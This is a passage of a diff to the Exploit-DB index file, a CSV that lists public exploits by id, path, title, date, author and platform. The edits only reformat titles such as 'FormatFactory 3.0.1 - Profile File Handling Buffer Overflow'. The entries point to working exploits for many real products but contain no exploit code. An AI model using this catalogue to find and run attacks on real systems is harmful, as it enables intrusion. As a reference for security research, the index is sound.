22826,platforms/php/webapps/22826.txt,"VisNetic WebMail 5.8.6 .6 Information Disclosure Vulnerability",2003-06-23,posidron,php,webapps,0 22827,platforms/windows/remote/22827.txt,"Compaq Web-Based Management Agent Remote File Verification Vulnerability",2003-06-23,"Ian Vitek",windows,remote,0 -22828,platforms/php/webapps/22828.txt,"WeBid <=1.0.5 Cross Site Scripting Vulnerabilities",2012-11-19,"Woody Hughes",php,webapps,0 +22828,platforms/php/webapps/22828.txt,"WeBid <= 1.0.5 - Cross Site Scripting Vulnerabilities",2012-11-19,"Woody Hughes",php,webapps,0 22829,platforms/php/webapps/22829.txt,"WeBid <= 1.0.5 Directory Traversal",2012-11-19,loneferret,php,webapps,80 22830,platforms/linux/remote/22830.c,"LBreakOut2 2.x Login Remote Format String Vulnerability",2003-06-24,V9,linux,remote,0 22831,platforms/freebsd/dos/22831.pl,"Gkrellmd 2.1 Remote Buffer Overflow Vulnerability (1)",2003-06-24,dodo,freebsd,dos,0 @@ -20079,10 +20079,10 @@ id,file,description,date,author,platform,type,port 22848,platforms/linux/remote/22848.c,"ezbounce 1.0/1.5 Format String Vulnerability",2003-07-01,V9,linux,remote,0 22849,platforms/jsp/webapps/22849.txt,"Verity K2 Toolkit 2.20 Cross-Site Scripting Vulnerability",2003-07-02,"SSR Team",jsp,webapps,0 22850,platforms/windows/dos/22850.txt,"Microsoft Office OneNote 2010 Crash PoC",2012-11-20,coolkaveh,windows,dos,0 -22851,platforms/windows/local/22851.py,"FormatFactory v3.0.1 Profile File Handling Buffer Overflow",2012-11-20,"Julien Ahrens",windows,local,0 -22852,platforms/multiple/webapps/22852.txt,"SonicWALL CDP 5040 v6.x Multiple Vulnerabilities",2012-11-20,Vulnerability-Lab,multiple,webapps,0 -22853,platforms/php/webapps/22853.txt,"Wordpress Facebook Survey v1 SQL Injection Vulnerability",2012-11-20,"Vulnerability Research Laboratory",php,webapps,0 -22854,platforms/windows/remote/22854.txt,"LAN.FS Messenger v2.4 Command Execution Vulnerability",2012-11-20,Vulnerability-Lab,windows,remote,0 +22851,platforms/windows/local/22851.py,"FormatFactory 3.0.1 - Profile File Handling Buffer Overflow",2012-11-20,"Julien Ahrens",windows,local,0 +22852,platforms/multiple/webapps/22852.txt,"SonicWALL CDP 5040 6.x - Multiple Vulnerabilities",2012-11-20,Vulnerability-Lab,multiple,webapps,0 +22853,platforms/php/webapps/22853.txt,"Wordpress Facebook Survey 1.0 - SQL Injection Vulnerability",2012-11-20,"Vulnerability Research Laboratory",php,webapps,0 +22854,platforms/windows/remote/22854.txt,"LAN.FS Messenger 2.4 - Command Execution Vulnerability",2012-11-20,Vulnerability-Lab,windows,remote,0 22855,platforms/windows/dos/22855.txt,"Apple QuickTime 7.7.2 Targa image Buffer Overflow",2012-11-20,"Senator of Pirates",windows,dos,0 22856,platforms/linux/remote/22856.rb,"Narcissus Image Configuration Passthru Vulnerability",2012-11-21,metasploit,linux,remote,0 22857,platforms/jsp/webapps/22857.txt,"Verity K2 Toolkit 2.20 Query Builder Search Script Cross-Site Scripting Vulnerability",2003-07-02,"SSR Team",jsp,webapps,0 @@ -20188,7 +20188,7 @@ id,file,description,date,author,platform,type,port 22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (1)",2003-07-29,D4rkGr3y,windows,remote,0 22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (2)",2003-07-29,Anonymous,windows,remote,0 22968,platforms/linux/remote/22968.c,"Valve Software Half-Life Server <= 1.1.1.0 , 3.1.1.1c1 and 4.1.1.1a Multiplayer Request Buffer Overflow",2003-07-29,hkvig,linux,remote,0 -22969,platforms/linux/remote/22969.c,"Valve Software Half-Life Server v3.1.1.0 Multiplayer Request Buffer Overflow",2003-07-29,KnbykL,linux,remote,0 +22969,platforms/linux/remote/22969.c,"Valve Software Half-Life Server 3.1.1.0 - Multiplayer Request Buffer Overflow",2003-07-29,KnbykL,linux,remote,0 22970,platforms/windows/dos/22970.txt,"NetScreen ScreenOS 4.0.1/4.0.3 TCP Window Size Remote Denial Of Service Vulnerability",2003-07-29,"Papa loves Mambo",windows,dos,0 22971,platforms/linux/local/22971.txt,"ManDB Utility 2.3/2.4 Local Buffer Overflow Vulnerabilities",2003-07-29,V9,linux,local,0 22972,platforms/windows/webapps/22972.txt,"Gleamtech FileVista/FileUltimate 4.6 Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0 @@ -20224,7 +20224,7 @@ id,file,description,date,author,platform,type,port 23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 Null Password Authentication Vulnerability",2003-08-09,"Buckaroo Banzai",windows,remote,0 23003,platforms/windows/dos/23003.py,"UMPlayer Portable 0.95 Crash PoC",2012-11-29,p3kok,windows,dos,0 23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 Multiple XSS POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0 -23005,platforms/asp/webapps/23005.txt,"FCKEditor ASP Version 2.6.8 File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0 +23005,platforms/asp/webapps/23005.txt,"FCKEditor ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0 23006,platforms/php/remote/23006.rb,"Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection",2012-11-29,metasploit,php,remote,0 23007,platforms/windows/local/23007.rb,"Windows AlwaysInstallElevated MSI",2012-11-29,metasploit,windows,local,0 23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 Subject Field HTML Injection Vulnerability",2003-08-11,G00db0y,php,webapps,0 @@ -20270,7 +20270,7 @@ id,file,description,date,author,platform,type,port 23049,platforms/linux/remote/23049.c,"Srcpd 2.0 Multiple Buffer Overflow Vulnerabilities",2003-08-21,Over_G,linux,remote,0 23050,platforms/multiple/dos/23050.txt,"Avant Browser 8.0.2 Long HTTP Request Buffer Overflow Vulnerability",2003-08-21,nimber@designer.ru,multiple,dos,0 23051,platforms/multiple/dos/23051.txt,"WapServ 1.0 Denial Of Service Vulnerabilities",2003-08-22,"Blue eyeguy4u",multiple,dos,0 -23052,platforms/windows/local/23052.rb,"BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability",2012-12-01,metasploit,windows,local,0 +23052,platforms/windows/local/23052.rb,"BlazeVideo HDTV Player Pro 6.6 - Filename Handling Vulnerability",2012-12-01,metasploit,windows,local,0 23053,platforms/windows/dos/23053.pl,"Vpop3d Remote Denial Of Service Vulnerability",2003-08-22,daniels@legend.co.uk,windows,dos,0 23054,platforms/linux/remote/23054.txt,"WIDZ 1.0/1.5 Remote Root Compromise Vulnerability",2003-08-23,kf,linux,remote,0 23055,platforms/asp/webapps/23055.txt,"IdealBB 1.4.9 Beta HTML Injection Vulnerability",2003-08-23,"Scott M",asp,webapps,0 @@ -20287,7 +20287,7 @@ id,file,description,date,author,platform,type,port 23066,platforms/windows/remote/23066.pl,"Tellurian TftpdNT 1.8/2.0 Long Filename Buffer Overrun Vulnerability",2003-08-27,storm,windows,remote,0 23067,platforms/php/webapps/23067.txt,"eNdonesia 8.2/8.3 Mod Parameter Cross-Site Scripting Vulnerability",2003-08-27,"Bahaa Naamneh",php,webapps,0 23068,platforms/windows/remote/23068.txt,"File Sharing for Net 1.5 Directory Traversal File Disclosure Vulnerability",2003-08-30,sickle,windows,remote,0 -23069,platforms/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 Information Disclosure Vulnerability",2003-08-30,"Martin Eiszner",multiple,remote,0 +23069,platforms/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 Information Disclosure Vulnerability",2003-08-30,"Martin Eiszner",multiple,remote,0 23070,platforms/multiple/remote/23070.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 Directory Traversal File Disclosure Vulnerability",2003-08-30,"Martin Eiszner",multiple,remote,0 23071,platforms/multiple/remote/23071.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 Cross Site Scripting Vulnerability",2003-08-30,"Martin Eiszner",multiple,remote,0 23072,platforms/php/webapps/23072.txt,"Ezboard 'invitefriends.php3' Cross Site Scripting Vulnerability",2003-09-01,"David F. Madrid",php,webapps,0 @@ -20348,7 +20348,7 @@ id,file,description,date,author,platform,type,port 23129,platforms/php/webapps/23129.txt,"Invision Power Board 1.x Index.php Showtopic Cross-Site Scripting Vulnerability",2003-09-09,"Boy Bear",php,webapps,0 23130,platforms/windows/dos/23130.txt,"Gordano Messaging Suite 9.0 WWW.exe Denial of Service Vulnerability",2003-09-10,"Phuong Nguyen",windows,dos,0 23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6.0 Script Execution Vulnerabilities",2003-09-10,"Liu Die Yu and Jelmer",windows,remote,0 -23132,platforms/windows/webapps/23132.py,"Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day",2012-12-04,Nin3,windows,webapps,0 +23132,platforms/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal 0day",2012-12-04,Nin3,windows,webapps,0 23135,platforms/windows/remote/23135.txt,"FloosieTek FTGatePro 1.2 WebAdmin Interface Information Disclosure Weakness",2003-09-10,"Phuong Nguyen",windows,remote,0 23136,platforms/multiple/remote/23136.txt,"FutureWave WebX Server 1.1 Directory Traversal Vulnerability",2003-09-10,dr_insane,multiple,remote,0 23137,platforms/multiple/remote/23137.txt,"CacheFlow CacheOS 4.1.10016 HTTP HOST Proxy Vulnerability",2003-09-10,"Tim Kennedy",multiple,remote,0 @@ -20394,7 +20394,7 @@ id,file,description,date,author,platform,type,port 23177,platforms/windows/dos/23177.txt,"NVIDIA Install Application 2.1002.85.551 (NVI2.dll) Unicode Buffer Overflow PoC",2012-12-06,LiquidWorm,windows,dos,0 23178,platforms/multiple/remote/23178.rb,"Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution",2012-12-06,metasploit,multiple,remote,0 23179,platforms/windows/remote/23179.rb,"Oracle MySQL for Microsoft Windows MOF Execution",2012-12-06,metasploit,windows,remote,0 -23180,platforms/php/webapps/23180.txt,"Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability",2012-12-06,"Woody Hughes",php,webapps,0 +23180,platforms/php/webapps/23180.txt,"Kordil EDMS 2.2.60rc3 - SQL Injection Vulnerability",2012-12-06,"Woody Hughes",php,webapps,0 23181,platforms/multiple/dos/23181.txt,"NullLogic Null HTTPd 0.5 Remote Denial Of Service Vulnerability",2003-09-24,"Luigi Auriemma",multiple,dos,0 23182,platforms/linux/remote/23182.c,"CFEngine 2.0.x CFServD Transaction Packet Buffer Overrun Vulnerability (1)",2003-09-25,jsk,linux,remote,0 23183,platforms/linux/remote/23183.c,"CFEngine 2.0.x CFServD Transaction Packet Buffer Overrun Vulnerability (2)",2003-11-04,snooq,linux,remote,0 @@ -20465,7 +20465,7 @@ id,file,description,date,author,platform,type,port 23248,platforms/arm/dos/23248.txt,"Android Kernel 2.6 Local DoS Crash PoC",2012-12-09,G13,arm,dos,0 23249,platforms/php/webapps/23249.txt,"MyBB KingChat Plugin - Persistent XSS",2012-12-09,VipVince,php,webapps,0 23250,platforms/hardware/webapps/23250.txt,"Cisco DPC2420 Multiples Vulnerabilities",2012-12-09,"Facundo M. de la Cruz",hardware,webapps,0 -23251,platforms/linux/local/23251.txt,"Centrify Deployment Manager v2.1.0.283 Local Root",2012-12-09,"Larry W. Cashdollar",linux,local,0 +23251,platforms/linux/local/23251.txt,"Centrify Deployment Manager 2.1.0.283 - Local Root",2012-12-09,"Larry W. Cashdollar",linux,local,0 23252,platforms/php/webapps/23252.txt,"ClipBucket 2.6 Revision 738 Multiple SQL Injection Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23253,platforms/php/webapps/23253.txt,"Achievo 1.4.5 Multiple Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23254,platforms/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 Denial of Service Vulnerability",2012-12-09,"High-Tech Bridge SA",windows,dos,0 @@ -20581,7 +20581,7 @@ id,file,description,date,author,platform,type,port 23370,platforms/cgi/webapps/23370.txt,"nCube Server Manager 1.0 Directory Traversal Vulnerability",2003-11-10,"Beck Mr.R",cgi,webapps,0 23371,platforms/linux/remote/23371.c,"Hylafax 4.1.x HFaxD Unspecified Format String Vulnerability",2003-11-10,"Sebastian Krahmer",linux,remote,0 23372,platforms/php/webapps/23372.txt,"PHP-Coolfile 1.4 Unauthorized Administrative Access Vulnerability",2003-11-11,r00t@rsteam.ru,php,webapps,0 -23373,platforms/windows/remote/23373.html,"Opera Web Browser 7.x URI Handler Directory Traversal Vulnerability",2003-11-12,S.G.Masood,windows,remote,0 +23373,platforms/windows/remote/23373.html,"Opera Web Browser 7.x URI Handler Directory Traversal Vulnerability",2003-11-12,S.G.Masood,windows,remote,0 23374,platforms/windows/dos/23374.pl,"Qualcomm Eudora 5.x/6.0 Spoofed Attachment Line Denial Of Service Vulnerability",2003-11-12,"Paul Szabo",windows,dos,0 23375,platforms/linux/dos/23375.txt,"GNU Zebra 0.9x / Quagga 0.96 Remote Denial of Service Vulnerability",2003-11-12,"Jonny Robertson",linux,dos,0 23376,platforms/hardware/remote/23376.txt,"FortiGate Firewall 2.x dlg Admin Interface XSS",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 @@ -20629,7 +20629,7 @@ id,file,description,date,author,platform,type,port 23419,platforms/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 Authentication Bypass Vulnerability",2003-12-08,"Luigi Auriemma",windows,remote,0 23420,platforms/php/webapps/23420.txt,"Bitfolge Snif 1.2.6 Index.PHP Path Cross-Site Scripting Vulnerability",2003-12-09,"Justin Hagstrom",php,webapps,0 23421,platforms/cgi/webapps/23421.txt,"CalaCode @mail Webmail System 3.52 Multiple Vulnerabilities",2003-12-09,"Nick Gudov",cgi,webapps,0 -23422,platforms/windows/remote/23422.txt,"Internet Explorer 5/6,Mozilla 1.2.1 URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0 +23422,platforms/windows/remote/23422.txt,"Internet Explorer 5/6,Mozilla 1.2.1 URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0 23423,platforms/windows/remote/23423.txt,"Internet Explorer 5/6,Mozilla 1.2.1 URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote,0 23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Stored XSS",2012-12-16,limb0,php,webapps,0 23427,platforms/linux/dos/23427.txt,"Totem Movie Player (Ubuntu) 3.4.3 Stack Corruption",2012-12-16,coolkaveh,linux,dos,0 @@ -20653,7 +20653,7 @@ id,file,description,date,author,platform,type,port 23445,platforms/php/webapps/23445.txt,"osCommerce 2.2 osCsid Parameter Cross-Site Scripting Vulnerability",2003-12-17,JeiAr,php,webapps,0 23446,platforms/windows/remote/23446.txt,"GoAhead Webserver 2.1.x ASP Script File Source Code Disclosure Vulnerability",2002-12-17,"Luigi Auriemma",windows,remote,0 23447,platforms/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me Setup.PL Arbitrary Command Execution Vulnerability",2003-12-18,"Paul Craig",cgi,webapps,0 -23448,platforms/php/webapps/23448.php,"phpwcms <= v1.5.4.6 ""preg_replace"" Multiple Vulnerabilities",2012-12-17,aeon,php,webapps,0 +23448,platforms/php/webapps/23448.php,"phpwcms <= 1.5.4.6 ""preg_replace"" - Multiple Vulnerabilities",2012-12-17,aeon,php,webapps,0 23449,platforms/unix/remote/23449.txt,"Xerox MicroServer Web Server Remote Directory Traversal Vulnerability",2003-12-19,"J.A. Gutierrez",unix,remote,0 23450,platforms/windows/remote/23450.txt,"PY Software Active Webcam 4.3 Webserver Directory Traversal Vulnerability",2003-12-19,"Luigi Auriemma",windows,remote,0 23451,platforms/windows/remote/23451.txt,"PY Software Active Webcam 4.3 Webserver Cross-Site Scripting Vulnerability",2003-12-19,"Luigi Auriemma",windows,remote,0 @@ -20700,7 +20700,7 @@ id,file,description,date,author,platform,type,port 23494,platforms/php/webapps/23494.txt,"Clockstone and other CMSMasters Theme File Upload Vulnerabilities",2012-12-19,DigiP,php,webapps,0 23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 GIF Decode Crash PoC",2012-12-19,"Lizhi Wang",windows,dos,0 23498,platforms/hardware/webapps/23498.txt,"SonicWall SonicOS 5.8.1.8 WAF XSS Vulnerability",2012-12-19,Vulnerability-Lab,hardware,webapps,0 -23499,platforms/hardware/webapps/23499.txt,"Enterpriser16 Load Balancer v7.1 Multiple XSS Vulnerabilities",2012-12-19,Vulnerability-Lab,hardware,webapps,0 +23499,platforms/hardware/webapps/23499.txt,"Enterpriser16 Load Balancer 7.1 - Multiple XSS Vulnerabilities",2012-12-19,Vulnerability-Lab,hardware,webapps,0 23500,platforms/windows/remote/23500.rb,"InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow",2012-12-20,metasploit,windows,remote,0 23501,platforms/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow Vulnerability (1)",2003-12-29,"Behrang Fouladi",windows,dos,0 23502,platforms/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow Vulnerability (2)",2003-12-29,"Rosiello Security",windows,remote,0 @@ -20732,9 +20732,9 @@ id,file,description,date,author,platform,type,port 23529,platforms/windows/remote/23529.txt,"SnapStream PVS Lite 2.0 Cross-Site Scripting Vulnerability",2004-01-06,"Rafel Ivgi",windows,remote,0 23530,platforms/windows/dos/23530.c,"Kroum Grigorov KpyM Telnet Server 1.0 Remote Denial Of Service Vulnerability",2004-01-07,NoRpiuS,windows,dos,0 23531,platforms/windows/remote/23531.c,"HD Soft Windows FTP Server 1.5/1.6 Username Format String Vulnerability",2004-01-12,mandragore,windows,remote,0 -23532,platforms/windows/remote/23532.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 FreeWeb Directory Traversal Vulnerability",2004-01-09,badpack3t,windows,remote,0 +23532,platforms/windows/remote/23532.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb Directory Traversal Vulnerability",2004-01-09,badpack3t,windows,remote,0 23533,platforms/windows/remote/23533.txt,"Accipiter DirectServer 6.0 Remote File Disclosure Vulnerability",2004-01-09,"Mark Bassett",windows,remote,0 -23534,platforms/windows/dos/23534.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 FreeWeb CreateFile Function Denial of Service Vulnerability",2004-01-09,badpack3t,windows,dos,0 +23534,platforms/windows/dos/23534.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb CreateFile Function Denial of Service Vulnerability",2004-01-09,badpack3t,windows,dos,0 23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x Edit.CGI Remote Directory Traversal Vulnerability",2004-01-10,FIST,cgi,webapps,0 23536,platforms/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script Information Disclosure Vulnerability",2004-01-10,"Cabezon Aurelien",php,webapps,0 23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 Module.PHP Remote Command Execution Vulnerability",2004-01-10,"Zero X",php,webapps,0 @@ -20770,7 +20770,7 @@ id,file,description,date,author,platform,type,port 23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 (CheckCompatibility()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 (Admin_RemoveDirectory()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23571,platforms/asp/webapps/23571.txt,"SelectSurvey CMS (ASP.NET) Arbitrary File Upload",2012-12-21,040,asp,webapps,0 -23572,platforms/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 Multiple Vulnerabilities",2012-12-21,xistence,hardware,webapps,0 +23572,platforms/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP firmware <= 9.70.0.100 - Multiple Vulnerabilities",2012-12-21,xistence,hardware,webapps,0 23573,platforms/php/webapps/23573.txt,"Banana Dance B.2.6 Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 NULL Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 23575,platforms/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 Multiple SQL Injection Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 @@ -20886,10 +20886,10 @@ id,file,description,date,author,platform,type,port 23690,platforms/linux/dos/23690.txt,"XFree86 4.x CopyISOLatin1Lowered Font_Name Buffer Overflow Vulnerability",2004-02-12,"Greg MacManus",linux,dos,0 23691,platforms/php/webapps/23691.txt,"VBulletin 3.0 Search.PHP Cross-Site Scripting Vulnerability",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 Invalid Command Argument Local DoS",2004-02-13,"intuit e.b.",windows,dos,0 -23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 Library Crafted GET Request Remote DoS",2004-02-13,"intuit e.b.",windows,dos,0 +23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Request Remote DoS",2004-02-13,"intuit e.b.",windows,dos,0 23694,platforms/windows/remote/23694.rb,"RealPlayer RealMedia File Handling Buffer Overflow",2012-12-27,metasploit,windows,remote,0 23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 ITS Protocol Zone Bypass Vulnerability",2004-02-13,Anonymous,windows,remote,0 -23696,platforms/asp/webapps/23696.pl,"ASP Portal Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0 +23696,platforms/asp/webapps/23696.pl,"ASP Portal Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0 23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 23698,platforms/php/webapps/23698.txt,"AllMyVisitors 0.x info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x footer.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 @@ -21018,10 +21018,10 @@ id,file,description,date,author,platform,type,port 23823,platforms/php/webapps/23823.txt,"VBulletin 3.0 ShowThread.PHP Cross-Site Scripting Vulnerability",2004-03-16,JeiAr,php,webapps,0 23824,platforms/php/webapps/23824.txt,"Mambo Open Source 4.5 index.php Multiple Parameter XSS",2004-03-16,JeiAr,php,webapps,0 23825,platforms/php/webapps/23825.txt,"Mambo Open Source 4.5 index.php mos_change_template Parameter XSS",2004-03-16,JeiAr,php,webapps,0 -23828,platforms/php/webapps/23828.txt,"e107 v1.0.1 CSRF Resulting in Arbitrary Javascript Execution",2013-01-02,"Joshua Reynolds",php,webapps,0 -23829,platforms/php/webapps/23829.txt,"e107 v1.0.2 CSRF Resulting in SQL Injection",2013-01-02,"Joshua Reynolds",php,webapps,0 -23830,platforms/linux/dos/23830.py,"Astium VoIP PBX <= v2.1 build 25399 Remote Crash PoC",2013-01-02,xistence,linux,dos,5655 -23831,platforms/php/webapps/23831.py,"Astium VoIP PBX <= v2.1 build 25399 Multiple Vulns Remote Root Exploit",2013-01-02,xistence,php,webapps,0 +23828,platforms/php/webapps/23828.txt,"e107 1.0.1 - CSRF Resulting in Arbitrary Javascript Execution",2013-01-02,"Joshua Reynolds",php,webapps,0 +23829,platforms/php/webapps/23829.txt,"e107 1.0.2 - CSRF Resulting in SQL Injection",2013-01-02,"Joshua Reynolds",php,webapps,0 +23830,platforms/linux/dos/23830.py,"Astium VoIP PBX <= 2.1 build 25399 - Remote Crash PoC",2013-01-02,xistence,linux,dos,5655 +23831,platforms/php/webapps/23831.py,"Astium VoIP PBX <= 2.1 build 25399 - Multiple Vulns Remote Root Exploit",2013-01-02,xistence,php,webapps,0 23834,platforms/php/webapps/23834.txt,"Mambo Open Source 4.5 Index.PHP SQL Injection Vulnerability",2004-03-16,JeiAr,php,webapps,0 23835,platforms/php/webapps/23835.txt,"PHP-Nuke 6.x/7.0/7.1 Image Tag Admin Command Execution Vulnerability",2004-03-16,"Janek Vind",php,webapps,0 23836,platforms/windows/remote/23836.txt,"IBM Lotus Domino 6/7 HTTP webadmin.nsf Directory Traversal Vulnerability",2004-03-17,dr_insane,windows,remote,0 @@ -21109,7 +21109,7 @@ id,file,description,date,author,platform,type,port 23919,platforms/windows/dos/23919.txt,"Symantec Security Check Virus Detection COM Object Denial Of Service Vulnerability",2004-04-07,"Rafel Ivgi The-Insider",windows,dos,0 23920,platforms/windows/dos/23920.txt,"Mcafee FreeScan CoMcFreeScan Browser Object Buffer Overflow Vulnerability",2004-04-07,"Rafel Ivgi The-Insider",windows,dos,0 23921,platforms/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 Local Buffer Overflow Vulnerability",2004-04-07,I2S-LaB,windows,local,0 -23923,platforms/windows/dos/23923.py,"FoxPlayer v2.9.0 Denial of Service Vulnerability",2013-01-06,metacom,windows,dos,0 +23923,platforms/windows/dos/23923.py,"FoxPlayer 2.9.0 - Denial of Service Vulnerability",2013-01-06,metacom,windows,dos,0 23924,platforms/multiple/webapps/23924.txt,"Nexpose Security Console CSRF Vulnerability",2013-01-06,"Robert Gilbert",multiple,webapps,0 23925,platforms/windows/dos/23925.txt,"Kerio Personal Firewall 4.0.x Web Filtering Remote Denial Of Service Vulnerability",2004-04-07,E.Kellinis,windows,dos,0 23926,platforms/windows/remote/23926.txt,"Mcafee FreeScan CoMcFreeScan Browser Information Disclosure Vulnerability",2004-04-07,"S G Masood",windows,remote,0 @@ -21180,11 +21180,11 @@ id,file,description,date,author,platform,type,port 23993,platforms/php/webapps/23993.txt,"Websitebaker Add-on Concert Calendar 2.1.4 Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0 23994,platforms/php/webapps/23994.txt,"Free Blog 1.0 Multiple Vulnerabilities",2013-01-09,cr4wl3r,php,webapps,0 23995,platforms/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",hardware,webapps,0 -23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 Crafted JPEG File Exploit",2013-01-09,"Debasish Mandal",windows,local,0 +23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - (.jpeg) Exploit",2013-01-09,"Debasish Mandal",windows,local,0 23997,platforms/php/webapps/23997.txt,"WeBid 1.0.6 SQL Injection Vulnerability",2013-01-09,"Life Wasted",php,webapps,0 23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x Multiple SQL Injection Vulnerabilities",2004-04-13,waraxe,php,webapps,0 23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x Format String Vulnerabilities",2004-04-14,"Thomas Wana",linux,dos,0 -24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 MIME Message Nesting Denial of Service Vulnerability",2004-04-14,"Paul Szabo",windows,dos,0 +24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 MIME Message Nesting Denial of Service Vulnerability",2004-04-14,"Paul Szabo",windows,dos,0 24001,platforms/cgi/webapps/24001.txt,"Rhino Software Zaep AntiSpam 2.0 Cross-Site Scripting Vulnerability",2004-04-14,"Noam Rathaus",cgi,webapps,0 24002,platforms/windows/dos/24002.py,"Microsoft Outlook Express 6.0 Remote Denial Of Service Vulnerability",2004-04-14,"Ben Rampling",windows,dos,0 24003,platforms/php/webapps/24003.txt,"phpBugTracker 0.9 query.php Multiple Parameter SQL Injection",2004-04-15,JeiAr,php,webapps,0 @@ -21202,7 +21202,7 @@ id,file,description,date,author,platform,type,port 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x Mille Local Save Game File Name Buffer Overrun Vulnerability",2004-04-17,N4rK07IX,bsd,local,0 24016,platforms/php/webapps/24016.txt,"Phorum 3.4.x Phorum_URIAuth SQL Injection Vulnerability",2004-04-19,"Janek Vind",php,webapps,0 24017,platforms/windows/remote/24017.html,"Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass",2013-01-10,sickness,windows,remote,0 -24018,platforms/php/remote/24018.rb,"eXtplorer v2.1 Arbitrary File Upload Vulnerability",2013-01-10,metasploit,php,remote,0 +24018,platforms/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload Vulnerability",2013-01-10,metasploit,php,remote,0 24019,platforms/multiple/remote/24019.rb,"Ruby on Rails XML Processor YAML Deserialization Code Execution",2013-01-10,metasploit,multiple,remote,0 24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer Option Element Use-After-Free",2013-01-10,metasploit,windows,remote,0 24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer ActiveX Remote Code Execution",2013-01-10,metasploit,windows,remote,0 @@ -21292,8 +21292,8 @@ id,file,description,date,author,platform,type,port 24106,platforms/linux/remote/24106.txt,"Open WebMail 1.x/2.x Remote Command Execution Variant Vulnerability",2004-05-10,Nullbyte,linux,remote,0 24107,platforms/windows/dos/24107.pl,"EMule Web 0.42 Control Panel Denial Of 